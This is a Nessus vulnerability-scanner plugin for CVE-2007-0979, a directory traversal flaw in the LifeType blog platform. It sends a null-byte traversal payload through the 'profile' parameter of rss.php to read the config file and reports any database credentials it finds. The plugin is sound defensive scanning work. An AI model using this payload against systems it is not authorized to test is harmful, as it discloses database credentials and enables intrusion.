#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to an
information disclosure vulnerability. 

Description :

The remote host is running LifeType, an open-source blogging platform
written in PHP. 

The version of LifeType installed on the remote fails to sanitize
input to the 'profile' parameter of the 'rss.php' script of directory
traversal sequences.  An unauthenticated remote attacker is able to
leverage this flaw to read files on the affected host and disclose
sensitive information, such as configuration parameters used by the
application. 

See also :

http://www.nessus.org/u?bc5c2a48

Solution :

Upgrade to Lifetype 1.1.6 / 1.2-beta2 or later. 

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(24356);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-0979");
  script_bugtraq_id(22572);
  script_xref(name:"OSVDB", value:"33210");

  script_name(english:"LifeType profile Parameter Information Disclosure Vulnerability");
  script_summary(english:"Tries to read the configuration file for LifeType");
 
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/lifetype", "/blog", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the flaw to read the config file.
  file = "../../config/config.properties.php%00";
  req = http_get(
    item:string(
      dir, "/rss.php?",
      "blogId=1&",
      "profile=", file
    ),
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if it looks like the config file.
  if (
    "$config" >< res &&
    res =~ "\$config\[.db_(host|username|password).\].*="
  )
  {
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Here are the contents of the file 'config/config.properties.php' file\n",
      "that Nessus was able to read from the remote host :\n",
      "\n",
      res
    );

    security_warning(port:port, data:report);
    exit(0);
  }
}
